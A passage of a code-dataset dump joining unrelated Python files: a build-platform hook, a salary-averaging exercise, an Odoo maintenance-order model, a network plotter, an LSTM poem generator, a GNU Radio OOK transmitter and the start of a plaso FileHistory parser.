response","sub_path":"src/sploitego/transforms/dnsaaaalookup.py","file_name":"dnsaaaalookup.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548608025","text":"# -*- coding: utf-8 -*-\n#\n# {project.authors}\n# {project.affiliations}\n# (c) {project.span} all rights reserved\n#\n\n\n# externals\nimport os\n\n\n# platform hook\ndef platform(builder):\n \"\"\"\n Decorate the builder with platform specific options\n \"\"\"\n # get the platform id\n platform = builder.host.system\n # print('platform:', platform)\n\n # on darwin\n if platform == 'Darwin':\n # assume macports\n systemdir = '/opt/local'\n systemlibdir = os.path.join(systemdir, 'lib')\n systemincdir = os.path.join(systemdir, 'include')\n\n # set up python\n pythonVersion = '3.4'\n pythonMemoryModel = 'm'\n python = 'python' + pythonVersion\n pythonHome = os.path.join(\n systemdir, 'Library/Frameworks/Python.framework/Versions', pythonVersion)\n builder.requirements['python'].environ = {{\n 'PYTHON': python,\n 'PYTHON_PYCFLAGS': '-b',\n 'PYTHON_DIR': systemdir,\n 'PYTHON_LIBDIR': os.path.join(pythonHome, 'lib'),\n 'PYTHON_INCDIR': os.path.join(pythonHome, 'include', python+pythonMemoryModel),\n }}\n\n # all done\n return builder\n\n # on linux\n if platform == 'Linux':\n # on normal distributions\n systemdir = '/usr'\n systemlibdir = os.path.join(systemdir, 'lib')\n systemincdir = os.path.join(systemdir, 'include')\n\n # set up python\n pythonVersion = '3.4'\n python = 'python' + pythonVersion\n builder.requirements['python'].environ = {{\n 'PYTHON': python,\n 'PYTHON_PYCFLAGS': '-b',\n 'PYTHON_DIR': systemdir,\n 'PYTHON_LIBDIR': os.path.join(systemdir, 'lib', python),\n 'PYTHON_INCDIR': os.path.join(systemdir, 'include', python),\n }}\n\n # all done\n return builder\n\n # on all other platforms\n return builder\n\n\n# end of file\n","sub_path":"templates/django/.mm/platforms.py","file_name":"platforms.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"612039467","text":"'''\nСоздать текстовый файл (не программно). Построчно записать фамилии сотрудников и величину их окладов\n(не менее 10 строк). Определить, кто из сотрудников имеет оклад менее 20 тысяч,\nвывести фамилии этих сотрудников. Выполнить подсчёт средней величины дохода сотрудников.\n'''\nsum_pay = 0\ntry:\n with open(\"workers.txt\") as f_obj:\n for i, line in enumerate(f_obj,1):\n sum_pay += float(line.split()[1])\n if float(line.split()[1]) < 20000:\n print(f\"{line.split()[0]} имеет оклад менее 20 тысяч, он получает = {line.split()[1]} руб.\")\n print(\"-\" * 30)\n print(f\"Средний доход сотрудников = {round(sum_pay/i, 2)} руб.\")\nexcept IOError:\n print(\"Произошла ошибка ввода-вывода!\")","sub_path":"53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642419028","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nfrom datetime import datetime, timedelta\nfrom odoo.tools.misc import formatLang, format_date, get_lang\n\nclass BimMaintenance(models.Model):\n _name = \"bim.maintenance\"\n _inherit = ['mail.thread', 'mail.activity.mixin', 'image.mixin']\n _description = \"Ordenes Mantenimiento BIM\"\n _order = 'id desc'\n\n @api.depends('line_ids.price_subtotal')\n def _compute_total(self):\n for record in self:\n record.amount_total = sum(x.price_subtotal for x in record.line_ids)\n\n @api.depends('requisition_ids')\n def _compute_req_count(self):\n for project in self:\n project.req_count = len(project.requisition_ids)\n\n def _compute_invoice(self):\n for record in self:\n record.invoice_count = len(record.invoice_ids)\n\n name = fields.Char(string='Referencia', required=True, copy=False,\n readonly=True, states={'draft': [('readonly', False)]},\n index=True, default=lambda self: 'Nuevo')\n state = fields.Selection([\n ('draft', 'Nuevo'),\n ('planned', 'Programado'),\n ('done', 'Ejecutado'),\n ('invoiced', 'Facturado'),\n ('cancel', 'Cancelado'),\n ], string='Estado', readonly=True, copy=False, index=True,\n track_visibility='onchange', default='draft')\n date_planned = fields.Datetime(string='Fecha Estimada', required=True,\n readonly=True, index=True, states={'draft': [('readonly', False)]},\n copy=False, default=fields.Datetime.now)\n date_done = fields.Datetime(string='Fecha Ejecución',\n readonly=True, index=True, states={'draft': [('readonly', False)]},\n copy=False, default=fields.Datetime.now)\n partner_id = fields.Many2one('res.partner', string='Cliente', readonly=True,\n states={'draft': [('readonly', False)]}, required=True, change_default=True,\n index=True, track_visibility='always')\n project_id = fields.Many2one('bim.project', 'Obra', readonly=True,\n required=True, copy=False, states={'draft': [('readonly', False)]})\n invoice_ids = fields.One2many('account.move', 'maintenance_id', 'Facturas')\n invoice_count = fields.Integer('Facturas', compute=_compute_invoice)\n invoice_id = fields.Many2one('account.move', string='Factura', readonly=True)\n note = fields.Text('Observaciones')\n user_id = fields.Many2one('res.users', string='Responsable',\n states={'draft': [('readonly', False)]}, index=True,\n track_visibility='onchange', default=lambda self: self.env.user)\n company_id = fields.Many2one('res.company', 'Compañía', default=lambda self: self.env.company)\n currency_id = fields.Many2one(\"res.currency\", related='company_id.currency_id',\n string=\"Moneda\", readonly=True, required=True)\n line_ids = fields.One2many('bim.maintenance.line', 'maintenance_id',\n string='Líneas', states={'cancel': [('readonly', True)], 'done': [('readonly', True)]}, copy=True)\n amount_total = fields.Monetary('Total', compute=\"_compute_total\", store=True)\n requisition_ids = fields.One2many('bim.purchase.requisition','maintenance_id','Sol. de Materiales')\n req_count = fields.Integer('Cantidad Sol Materiales', compute=\"_compute_req_count\")\n maintenance_duration = fields.Integer('Duración Estimada (días)', default=1)\n department_id = fields.Many2one('bim.department', 'Departamento', related=\"project_id.department_id\", store=True)\n invoice_amount = fields.Monetary('Monto a Facturar')\n maintenance_currency_id = fields.Many2one('res.currency', 'Moneda', related=\"project_id.maintenance_currency_id\",\n store=True)\n reminder = fields.Boolean('recordatorio', compute='compute_reminder')\n days_reminder = fields.Integer('dias recordatorio', compute='compute_days_reminder')\n\n def compute_days_reminder(self):\n for record in self:\n today = fields.Datetime.now()\n rest = 0\n if format_date(record.env, today) <= format_date(record.env, record.date_planned):\n rest = record.date_planned - today\n if record.name == \"Nuevo\":\n record.days_reminder = rest.days + 1\n else:\n record.days_reminder = 0\n\n def compute_reminder(self):\n for record in self:\n today = fields.Datetime.now()\n reminder = False\n for day in record.company_id.array_day_ids:\n date_reminder = today + timedelta(days=day.name)\n date_reminder = format_date(self.env, date_reminder)\n date_planned = format_date(self.env, record.date_planned)\n if date_reminder == date_planned:\n reminder = True\n break\n if reminder:\n record.reminder = reminder\n else:\n record.reminder = False\n\n def action_send(self):\n maintenances = self.env['bim.maintenance'].search([])\n for mant in maintenances:\n if mant.reminder:\n template = mant.company_id.template_mant_id\n mail = template.send_mail(mant.id, force_send=True)\n if mail:\n mant.message_post(\n body=_(\"Enviado email a Soporte: %s\" % mant.project_id.customer_id.name))\n\n @api.model\n def create(self, vals):\n if vals.get('name', 'Nuevo') == 'Nuevo':\n vals['name'] = self.env['ir.sequence'].next_by_code('bim.maintenance') or 'Nuevo'\n maintenance = super(BimMaintenance, self).create(vals)\n return maintenance\n\n @api.onchange('project_id')\n def onchange_project_id(self):\n if self.project_id:\n self.partner_id = self.project_id.customer_id.id\n\n def action_programmed(self):\n self.write({'state': 'planned'})\n\n def action_executed(self):\n self.write({'state': 'done'})\n\n def action_cancel(self):\n self.write({'state': 'cancel'})\n\n def action_view_req(self):\n reqs = self.mapped('requisition_ids')\n action = self.env.ref('base_bim_2.action_bim_purchase_requisition').read()[0]\n action['domain'] = [('id', 'in', reqs.ids)]\n return action\n\n def generate_bim_req(self):\n self.ensure_one()\n req_lines = []\n for line in self.line_ids:\n if line.product_id.type != 'service' and line.product_id.resource_type in ['HR','M','Q'] and line.quantity > 0.0:\n req_lines.append((0,0,{\n 'product_id': line.product_id.id,\n 'um_id': line.uom_id.id,\n 'quant': line.quantity\n }))\n if len(req_lines) == 0:\n raise UserError(u'No hay productos por realizar solicitud')\n requisition = self.env['bim.purchase.requisition'].create({\n 'user_id': self.user_id.id,\n 'project_id': self.project_id.id,\n 'date_begin': datetime.now(),\n 'product_ids': req_lines,\n 'maintenance_id': self.id\n })\n action = self.env.ref('base_bim_2.action_bim_purchase_requisition')\n result = action.read()[0]\n res = self.env.ref('base_bim_2.view_form_bim_purchase_requisition', False)\n result['views'] = [(res and res.id or False, 'form')]\n result['res_id'] = requisition.id\n return result\n\n def generate_paidstate(self):\n self.ensure_one()\n epaid = self.env['bim.paidstate'].create({\n 'project_id': self.project_id.id,\n 'amount': self.invoice_amount,\n 'currency_id': self.maintenance_currency_id.id,\n 'maintenance_id': self.id\n })\n self.state = 'invoiced'\n action = self.env.ref('base_bim_2.action_bim_paidstate')\n result = action.read()[0]\n res = self.env.ref('base_bim_2.view_form_bim_paidstate', False)\n result['views'] = [(res and res.id or False, 'form')]\n result['res_id'] = epaid.id\n return result\n\n def action_view_invoices(self):\n invoices = []\n for inv in self.invoice_ids:\n if inv.type == 'out_invoice':\n invoices.append(inv.id)\n action = self.env.ref('account.action_move_out_invoice_type').read()[0]\n if len(invoices) > 0:\n action['domain'] = [('id', 'in', invoices)]\n else:\n action = {'type': 'ir.actions.act_window_close'}\n return action\n\nclass BimMaintenanceLine(models.Model):\n _name = 'bim.maintenance.line'\n _description = 'Lineas de mantenimiento'\n\n @api.depends('quantity','price_unit')\n def _compute_subtotal(self):\n for record in self:\n record.price_subtotal = record.quantity * record.price_unit\n\n name = fields.Char('Descripción')\n product_id = fields.Many2one('product.product', string='Producto')\n uom_id = fields.Many2one('uom.uom', 'UdM', related=\"product_id.uom_id\", readonly=True)\n quantity = fields.Float(\"Cantidad\")\n price_unit = fields.Float(\"Precio\")\n price_subtotal = fields.Float(\"Importe\", compute='_compute_subtotal')\n maintenance_id = fields.Many2one('bim.maintenance', string=\"Mantenimiento\", ondelete='cascade')\n\n @api.onchange('product_id')\n def onchange_product(self):\n if self.product_id:\n self.name = self.product_id.name\n\nclass BimMaintenanceTagsDays(models.Model):\n _name = \"bim.maintenance.tags.days\"\n _description = \"Dias restantes mantenimiento\"\n\n name = fields.Integer('Días')","sub_path":"base_bim_2/models/bim_maintenance.py","file_name":"bim_maintenance.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236936163","text":"import networkx as nx\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom lib.logger import log\n\nmatplotlib.use('TkAgg') # this is required for mac when matplotlib is used in\n # conjuction with tensorflow, otherwise a cryptic error\n # is thrown\n\ndef plot(nodes, ways, tags=None, ways_labels=None):\n\n G = nx.Graph()\n pos = {}\n\n for w_id, way in ways.items():\n parse_way = False\n if tags == None:\n parse_way = True\n else:\n for k, v in tags:\n if k in way.tags and (way.tags[k] == v or v == None):\n parse_way = True\n break\n\n if parse_way == False:\n continue\n\n log(\"Way accepted into plot with tags: {}\".format(way.tags), \"DEBUG\")\n for i in range(len(way.nodes)-1):\n n1, n2 = way.nodes[i], way.nodes[i+1]\n if n1 not in pos:\n G.add_node(n1, node_color=nodes[n1].color, label=str(n1))\n pos[n1] = nodes[n1].location\n if n2 not in pos:\n G.add_node(n2, node_color=nodes[n2].color, label=str(n2))\n pos[n2] = nodes[n2].location\n G.add_edge(n1, n2, width=1, edge_color=way.color)\n\n labels = nx.get_node_attributes(G,'label')\n options = { \"node_size\": 20, \"linewidths\": 0}#,\"labels\":labels}\n edges = G.edges()\n node_color = nx.get_node_attributes(G,'node_color').values()\n edge_width = [G[u][v]['width'] for u,v in edges]\n edge_color = [G[u][v]['edge_color'] for u,v in edges]\n\n nx.draw(G, pos, node_color=node_color, #edge_color=edge_color,\n width=edge_width, **options)\n\n if ways_labels != None:\n h2 = nx.draw_networkx_edges(G, pos=pos, edge_color=edge_color)\n\n def make_proxy(clr, mappable, **kwargs):\n return Line2D([0, 1], [0, 1], color=clr, **kwargs)\n\n # generate proxies with the above function\n proxies = [make_proxy(clr, h2, lw=5) for clr in list(ways_labels.values())]\n edge_labels = [\"{}\".format(tag) for tag, color in ways_labels.items()]\n plt.legend(proxies, edge_labels)\n\n plt.show()\n\ndef plot_cycles_w_density(nodes, cycles, buildings,tags=None,ways_labels=None):\n G = nx.Graph()\n pos = {}\n\n for c_id, cycle in cycles.items():\n c = cycle[\"n_ids\"]\n density_color = \"black\" if cycles[c_id][\"density\"] == 0 else \"blue\"\n for i in range(len(c)):\n n1 = c[i]\n n2 = c[(i+1)%len(c)]\n if n1 not in pos:\n G.add_node(n1, node_color=density_color, node_size=1.0)\n pos[n1] = nodes[n1].location\n if n2 not in pos:\n G.add_node(n2, node_color=density_color, node_size=1.0)\n pos[n2] = nodes[n2].location\n G.add_edge(n1, n2, width=1, edge_color=density_color)\n\n for w_id, way in buildings.items():\n for i in range(len(way.nodes)):\n n1 = way.nodes[i]\n n2 = way.nodes[(i+1)%len(way.nodes)]\n if n1 not in pos:\n G.add_node(n1, node_color=\"black\", node_size=0.1)\n pos[n1] = nodes[n1].location\n if n2 not in pos:\n G.add_node(n2, node_color=\"black\", node_size=0.1)\n pos[n2] = nodes[n2].location\n if G.has_edge(n1, n2) == False:\n G.add_edge(n1, n2, width=1, edge_color=\"black\")\n\n options = {\n \"linewidths\": 1,\n \"node_color\": nx.get_node_attributes(G,'node_color').values(),\n \"node_size\": list(nx.get_node_attributes(G,'node_size').values()),\n \"width\": [G[u][v]['width'] for u,v in G.edges()],\n \"edge_color\": [G[u][v]['edge_color'] for u,v in G.edges()]\n }\n nx.draw(G, pos, **options)\n\n plt.show()\n","sub_path":"generator/lib/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"75952598","text":"#importing dependencies\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM, RNN, GRU\nfrom keras.utils import np_utils\nimport os\n\n#load the data\nws_dir = './'\nweight_dir = 'saved_weight.h5'\ntext = open(ws_dir+'chairilanwar_poem.txt').read()\ntext = text.lower()\n\n#create charachter/word mappings\ncharachters = sorted(list(set(text)))\nn_to_char = {n:char for n, char in enumerate(charachters)}\nchar_to_n = {char:n for n, char in enumerate(charachters)}\n\n#data preprocessing\nX = []\nY = []\nX_modified = 0.0\nY_modified = 0.0\nmodel = None\nepoch = 10\nbatch = 200\nlength = len(text)\nseq_length = 120\n\ndef initialization() :\n global length, seq_length, text,char_to_n, n_to_char, X_modified, Y_modified, X, Y, charachters\n for i in range(0,length-seq_length,1):\n sequence = text[i : i+seq_length]\n label = text[i+seq_length]\n X.append([char_to_n[char] for char in sequence])\n Y.append(char_to_n[label])\n\n X_modified = np.reshape(X,(len(X),seq_length,1))\n X_modified = X_modified / float(len(charachters))\n Y_modified = np_utils.to_categorical(Y)\n\n#model\ndef runPoem() :\n global model, X_modified, Y_modified, epoch, batch, ws_dir, weight_dir\n model = Sequential()\n model.add(LSTM(200, input_shape=(X_modified.shape[1], X_modified.shape[2]), return_sequences=True))\n model.add(Dropout(0.25))\n model.add(LSTM(100,return_sequences=True))\n model.add(Dropout(0.2))\n model.add(GRU(200))\n model.add(Dropout(0.25))\n model.add(Dense(Y_modified.shape[1],activation='softmax'))\n if os.path.exists(ws_dir+weight_dir) :\n model.load_weights(ws_dir+weight_dir)\n model.compile(loss='categorical_crossentropy',optimizer='adam')\n model.fit(X_modified, Y_modified, epochs=epoch, batch_size=batch)\n model.save_weights(ws_dir+weight_dir)\n\ndef savePoem() :\n global model,X,Y, charachters, char_to_n, n_to_char, seq_length\n#generating text\n string_mapped = X[seq_length-1]\n full_string = [n_to_char[value] for value in string_mapped]\n#generating characters\n for i in range(seq_length) :\n x = np.reshape(string_mapped,(1,len(string_mapped),1))\n x = x / float(len(charachters))\n pred_index = np.argmax(model.predict(x,verbose=0))\n full_string.append(n_to_char[pred_index])\n string_mapped.append(pred_index)\n string_mapped = string_mapped[1:len(string_mapped)]\n\n#combining text\n txt = ''\n for char in full_string :\n txt = txt + char\n file = open('mypoem.txt','w')\n file.write(txt)\n file.close() \n\nif __name__ == '__main__' :\n initialization()\n runPoem()\n savePoem()\n","sub_path":"lstm-gru-poem.py","file_name":"lstm-gru-poem.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"567502198","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#\n# SPDX-License-Identifier: GPL-3.0\n#\n# GNU Radio Python Flow Graph\n# Title: ook_tx\n# Author: student\n# GNU Radio version: 3.9.2.0\n\nfrom distutils.version import StrictVersion\n\nif __name__ == '__main__':\n import ctypes\n import sys\n if sys.platform.startswith('linux'):\n try:\n x11 = ctypes.cdll.LoadLibrary('libX11.so')\n x11.XInitThreads()\n except:\n print(\"Warning: failed to XInitThreads()\")\n\nfrom PyQt5 import Qt\nfrom gnuradio import qtgui\nfrom gnuradio.filter import firdes\nimport sip\nfrom gnuradio import analog\nfrom gnuradio import blocks\nfrom gnuradio import filter\nfrom gnuradio import gr\nfrom gnuradio.fft import window\nimport sys\nimport signal\nfrom argparse import ArgumentParser\nfrom gnuradio.eng_arg import eng_float, intx\nfrom gnuradio import eng_notation\nimport limesdr\nimport ook_tx_epy_block_0 as epy_block_0 # embedded python block\n\n\n\nfrom gnuradio import qtgui\n\nclass ook_tx(gr.top_block, Qt.QWidget):\n\n def __init__(self):\n gr.top_block.__init__(self, \"ook_tx\", catch_exceptions=True)\n Qt.QWidget.__init__(self)\n self.setWindowTitle(\"ook_tx\")\n qtgui.util.check_set_qss()\n try:\n self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))\n except:\n pass\n self.top_scroll_layout = Qt.QVBoxLayout()\n self.setLayout(self.top_scroll_layout)\n self.top_scroll = Qt.QScrollArea()\n self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)\n self.top_scroll_layout.addWidget(self.top_scroll)\n self.top_scroll.setWidgetResizable(True)\n self.top_widget = Qt.QWidget()\n self.top_scroll.setWidget(self.top_widget)\n self.top_layout = Qt.QVBoxLayout(self.top_widget)\n self.top_grid_layout = Qt.QGridLayout()\n self.top_layout.addLayout(self.top_grid_layout)\n\n self.settings = Qt.QSettings(\"GNU Radio\", \"ook_tx\")\n\n try:\n if StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n self.restoreGeometry(self.settings.value(\"geometry\").toByteArray())\n else:\n self.restoreGeometry(self.settings.value(\"geometry\"))\n except:\n pass\n\n ##################################################\n # Variables\n ##################################################\n self.sps = sps = 25\n self.baud = baud = 1200\n self.upsamp = upsamp = 50\n self.samp_rate = samp_rate = sps*baud\n self.payload = payload = 'I am over the air! '\n\n ##################################################\n # Blocks\n ##################################################\n self.root_raised_cosine_filter_0 = filter.fir_filter_fff(\n 1,\n firdes.root_raised_cosine(\n 1,\n samp_rate,\n baud,\n 0.35,\n 11*sps))\n self.rational_resampler_xxx_0 = filter.rational_resampler_ccc(\n interpolation=upsamp,\n decimation=1,\n taps=[],\n fractional_bw=0)\n self.qtgui_time_sink_x_0 = qtgui.time_sink_f(\n 1024, #size\n samp_rate, #samp_rate\n 'Shaped Symbol Train', #name\n 1, #number of inputs\n None # parent\n )\n self.qtgui_time_sink_x_0.set_update_time(0.10)\n self.qtgui_time_sink_x_0.set_y_axis(-1, 1)\n\n self.qtgui_time_sink_x_0.set_y_label('Amplitude', \"\")\n\n self.qtgui_time_sink_x_0.enable_tags(True)\n self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, 0, \"\")\n self.qtgui_time_sink_x_0.enable_autoscale(False)\n self.qtgui_time_sink_x_0.enable_grid(True)\n self.qtgui_time_sink_x_0.enable_axis_labels(True)\n self.qtgui_time_sink_x_0.enable_control_panel(False)\n self.qtgui_time_sink_x_0.enable_stem_plot(False)\n\n self.qtgui_time_sink_x_0.disable_legend()\n\n labels = ['Signal 1', 'Signal 2', 'Signal 3', 'Signal 4', 'Signal 5',\n 'Signal 6', 'Signal 7', 'Signal 8', 'Signal 9', 'Signal 10']\n widths = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n colors = ['blue', 'red', 'green', 'black', 'cyan',\n 'magenta', 'yellow', 'dark red', 'dark green', 'dark blue']\n alphas = [1.0, 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0]\n styles = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n markers = [-1, -1, -1, -1, -1,\n -1, -1, -1, -1, -1]\n\n\n for i in range(1):\n if len(labels[i]) == 0:\n self.qtgui_time_sink_x_0.set_line_label(i, \"Data {0}\".format(i))\n else:\n self.qtgui_time_sink_x_0.set_line_label(i, labels[i])\n self.qtgui_time_sink_x_0.set_line_width(i, widths[i])\n self.qtgui_time_sink_x_0.set_line_color(i, colors[i])\n self.qtgui_time_sink_x_0.set_line_style(i, styles[i])\n self.qtgui_time_sink_x_0.set_line_marker(i, markers[i])\n self.qtgui_time_sink_x_0.set_line_alpha(i, alphas[i])\n\n self._qtgui_time_sink_x_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0.pyqwidget(), Qt.QWidget)\n self.top_layout.addWidget(self._qtgui_time_sink_x_0_win)\n self.qtgui_freq_sink_x_0 = qtgui.freq_sink_f(\n 1024, #size\n window.WIN_BLACKMAN_hARRIS, #wintype\n 0, #fc\n samp_rate, #bw\n 'TX Spectrum', #name\n 1,\n None # parent\n )\n self.qtgui_freq_sink_x_0.set_update_time(0.10)\n self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)\n self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')\n self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, \"\")\n self.qtgui_freq_sink_x_0.enable_autoscale(False)\n self.qtgui_freq_sink_x_0.enable_grid(True)\n self.qtgui_freq_sink_x_0.set_fft_average(1.0)\n self.qtgui_freq_sink_x_0.enable_axis_labels(True)\n self.qtgui_freq_sink_x_0.enable_control_panel(False)\n self.qtgui_freq_sink_x_0.set_fft_window_normalized(False)\n\n self.qtgui_freq_sink_x_0.disable_legend()\n\n self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)\n\n labels = ['', '', '', '', '',\n '', '', '', '', '']\n widths = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n colors = [\"blue\", \"red\", \"green\", \"black\", \"cyan\",\n \"magenta\", \"yellow\", \"dark red\", \"dark green\", \"dark blue\"]\n alphas = [1.0, 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0]\n\n for i in range(1):\n if len(labels[i]) == 0:\n self.qtgui_freq_sink_x_0.set_line_label(i, \"Data {0}\".format(i))\n else:\n self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])\n self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])\n self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])\n self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])\n\n self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)\n self.top_layout.addWidget(self._qtgui_freq_sink_x_0_win)\n self.limesdr_sink_0 = limesdr.sink('', 0, '', '')\n\n\n self.limesdr_sink_0.set_sample_rate(samp_rate*upsamp)\n\n\n self.limesdr_sink_0.set_center_freq(100e6, 0)\n\n self.limesdr_sink_0.set_bandwidth(5e6, 0)\n\n\n self.limesdr_sink_0.set_digital_filter(samp_rate*upsamp, 0)\n\n\n self.limesdr_sink_0.set_gain(40, 0)\n\n\n self.limesdr_sink_0.set_antenna(255, 0)\n\n\n self.limesdr_sink_0.calibrate(2.5e6, 0)\n self.epy_block_0 = epy_block_0.blk(scale=1, sps=sps)\n self.blocks_vector_source_x_0 = blocks.vector_source_b(list(ord(i) for i in payload), True, 1, [])\n self.blocks_packed_to_unpacked_xx_0 = blocks.packed_to_unpacked_bb(1, gr.GR_MSB_FIRST)\n self.blocks_float_to_complex_0 = blocks.float_to_complex(1)\n self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, 0)\n\n\n\n ##################################################\n # Connections\n ##################################################\n self.connect((self.analog_const_source_x_0, 0), (self.blocks_float_to_complex_0, 1))\n self.connect((self.blocks_float_to_complex_0, 0), (self.rational_resampler_xxx_0, 0))\n self.connect((self.blocks_packed_to_unpacked_xx_0, 0), (self.epy_block_0, 0))\n self.connect((self.blocks_vector_source_x_0, 0), (self.blocks_packed_to_unpacked_xx_0, 0))\n self.connect((self.epy_block_0, 0), (self.root_raised_cosine_filter_0, 0))\n self.connect((self.rational_resampler_xxx_0, 0), (self.limesdr_sink_0, 0))\n self.connect((self.root_raised_cosine_filter_0, 0), (self.blocks_float_to_complex_0, 0))\n self.connect((self.root_raised_cosine_filter_0, 0), (self.qtgui_freq_sink_x_0, 0))\n self.connect((self.root_raised_cosine_filter_0, 0), (self.qtgui_time_sink_x_0, 0))\n\n\n def closeEvent(self, event):\n self.settings = Qt.QSettings(\"GNU Radio\", \"ook_tx\")\n self.settings.setValue(\"geometry\", self.saveGeometry())\n self.stop()\n self.wait()\n\n event.accept()\n\n def get_sps(self):\n return self.sps\n\n def set_sps(self, sps):\n self.sps = sps\n self.set_samp_rate(self.sps*self.baud)\n self.epy_block_0.sps = self.sps\n self.root_raised_cosine_filter_0.set_taps(firdes.root_raised_cosine(1, self.samp_rate, self.baud, 0.35, 11*self.sps))\n\n def get_baud(self):\n return self.baud\n\n def set_baud(self, baud):\n self.baud = baud\n self.set_samp_rate(self.sps*self.baud)\n self.root_raised_cosine_filter_0.set_taps(firdes.root_raised_cosine(1, self.samp_rate, self.baud, 0.35, 11*self.sps))\n\n def get_upsamp(self):\n return self.upsamp\n\n def set_upsamp(self, upsamp):\n self.upsamp = upsamp\n self.limesdr_sink_0.set_digital_filter(self.samp_rate*self.upsamp, 0)\n\n def get_samp_rate(self):\n return self.samp_rate\n\n def set_samp_rate(self, samp_rate):\n self.samp_rate = samp_rate\n self.limesdr_sink_0.set_digital_filter(self.samp_rate*self.upsamp, 0)\n self.limesdr_sink_0.set_digital_filter(self.samp_rate, 1)\n self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)\n self.qtgui_time_sink_x_0.set_samp_rate(self.samp_rate)\n self.root_raised_cosine_filter_0.set_taps(firdes.root_raised_cosine(1, self.samp_rate, self.baud, 0.35, 11*self.sps))\n\n def get_payload(self):\n return self.payload\n\n def set_payload(self, payload):\n self.payload = payload\n self.blocks_vector_source_x_0.set_data(list(ord(i) for i in self.payload), [])\n\n\n\n\ndef main(top_block_cls=ook_tx, options=None):\n\n if StrictVersion(\"4.5.0\") <= StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n style = gr.prefs().get_string('qtgui', 'style', 'raster')\n Qt.QApplication.setGraphicsSystem(style)\n qapp = Qt.QApplication(sys.argv)\n\n tb = top_block_cls()\n\n tb.start()\n\n tb.show()\n\n def sig_handler(sig=None, frame=None):\n tb.stop()\n tb.wait()\n\n Qt.QApplication.quit()\n\n signal.signal(signal.SIGINT, sig_handler)\n signal.signal(signal.SIGTERM, sig_handler)\n\n timer = Qt.QTimer()\n timer.start(500)\n timer.timeout.connect(lambda: None)\n\n qapp.exec_()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ook_tx/ook_tx.py","file_name":"ook_tx.py","file_ext":"py","file_size_in_byte":11540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381257538","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Parser for the FileHistory Config.xml files.\"\"\"\r\n\r\nfrom __future__ import unicode_literals\r\n\r\nimport os\r\n\r\nfrom defusedxml import ElementTree\r\nfrom dfdatetime import java_time as dfdatetime_java_time\r\n\r\nfrom plaso.containers import events\r\nfrom plaso.containers import time_events\r\nfrom plaso.lib import errors\r\nfrom plaso.lib import definitions\r\nfrom plaso.parsers import interface\r\nfrom plaso.parsers import manager\r\n\r\nclass FileHistoryConfigEventData(events.EventData):\r\n \"\"\"Windows FileHistory event data.\r\n\r\n Attributes:\r\n user_name (str)\r\n friendly_name (str)\r\n pc_name (str)\r\n library (str)\r\n user_folder (str)\r\n folder_exclude (str)\r\n retention_policy (str)\r\n minimum_retention_age (str)\r\n dp_frequency (str)\r\n dp_status (str)\r\n target_name (str)\r\n target_url (str)\r\n target_volume_path (str)\r\n target_backup_store_path (str)\r\n \"\"\"\r\n\r\n DATA_TYPE = 'filehistory:config:event'\r\n\r\n def __init__(self):\r\n \"\"\"Initializes event data.\"\"\"\r\n super(FileHistoryConfigEventData, self).__init__(data_type=self.DATA_TYPE)\r\n self.user_name = ''\r\n self.friendly_name = ''\r\n self.pc_name = ''\r\n self.library = ''\r\n self.user_folder = ''\r\n self.folder_exclude = ''\r\n self.retention_policy = ''\r\n self.minimum_retention_age = ''\r\n self.dp_frequency = ''\r\n self.dp_status = ''\r\n self.target_name = ''\r\n self.target_url = ''\r\n self.target_volume_path = ''\r\n self.target_drive_type = ''\r\n self.target_backup_store_path = ''\r\n\r\nclass FileHistoryConfigParser(interface.FileObjectParser):\r\n \"\"\"Parses an Windows FileHistory Config.xml file-like object\"\"\"\r\n\r\n NAME = 